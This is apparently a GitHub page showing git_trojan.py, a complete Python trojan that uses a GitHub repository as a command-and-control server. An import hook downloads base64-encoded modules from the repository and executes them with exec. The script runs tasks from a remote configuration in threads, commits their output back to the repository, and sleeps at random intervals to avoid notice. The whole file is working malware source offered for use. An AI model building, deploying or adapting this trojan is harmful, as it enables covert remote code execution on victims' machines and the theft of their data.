-
Notifications
You must be signed in to change notification settings - Fork 419
/
Copy pathgit_trojan.py
109 lines (87 loc) · 3.19 KB
/
git_trojan.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
import json
import base64
import sys
import time
import types
import random
import threading
import queue
from github3 import login
trojan_id = "abc"
trojan_config = "config/{}.json".format(trojan_id)
data_path = "data/{}/".format(trojan_id)
trojan_modules = []
configured = False
task_queue = queue.Queue()
class GitImporter(object):
def __init__(self):
self.current_module_code = ""
def find_module(self, fullname, path=None):
if configured:
print("[*] Attempting to retrieve %s" % fullname)
new_library = get_file_contents("modules/%s" % fullname)
if new_library:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self, name):
module = types.ModuleType(name)
exec(self.current_module_code, module.__dict__)
sys.modules[name] = module
return module
def connect_to_github():
""" You can replace the password in the call to login() below for an
access token generated by GitHub if your account uses 2FA for access
(as it should). Easy-to-follow instructions on how to generate this
token can be found here:
https://help.github.com/en/github/authenticating-to-github/
creating-a-personal-access-token-for-the-command-line
If you choose to use the token, simply replace the 'password'
attribute for 'token' below and paste the token generated by
GitHub as a value instead of 'YourPassword'. The code should be:
gh = login(username="YourUsername", token="YourToken")
"""
gh = login(username="YourUsername", password="YourPassword")
repo = gh.repository("YourUsername", "RepositoryName")
branch = repo.branch("master")
return gh, repo, branch
def get_file_contents(filepath):
gh, repo, branch = connect_to_github()
tree = branch.commit.commit.tree.to_tree().recurse()
for filename in tree.tree:
if filepath in filename.path:
print("[*] Found file %s" % filepath)
blob = repo.blob(filename._json_data['sha'])
return blob.content
return None
def get_trojan_config():
global configured
config_json = get_file_contents(trojan_config)
configuration = json.loads(base64.b64decode(config_json))
configured = True
for tasks in configuration:
if tasks['module'] not in sys.modules:
exec("import %s" % tasks['module'])
return configuration
def store_module_result(data):
gh, repo, branch = connect_to_github()
remote_path = "data/%s/%d.data" % (trojan_id, random.randint(1000, 100000))
repo.create_file(remote_path, "Commit message", data.encode())
return
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
# store the result in our repo
store_module_result(result)
return
# main trojan loop
sys.meta_path = [GitImporter()]
while True:
if task_queue.empty():
config = get_trojan_config()
for task in config:
t = threading.Thread(target=module_runner, args=(task['module'],))
t.start()
time.sleep(random.randint(1, 10))
time.sleep(random.randint(1000, 10000))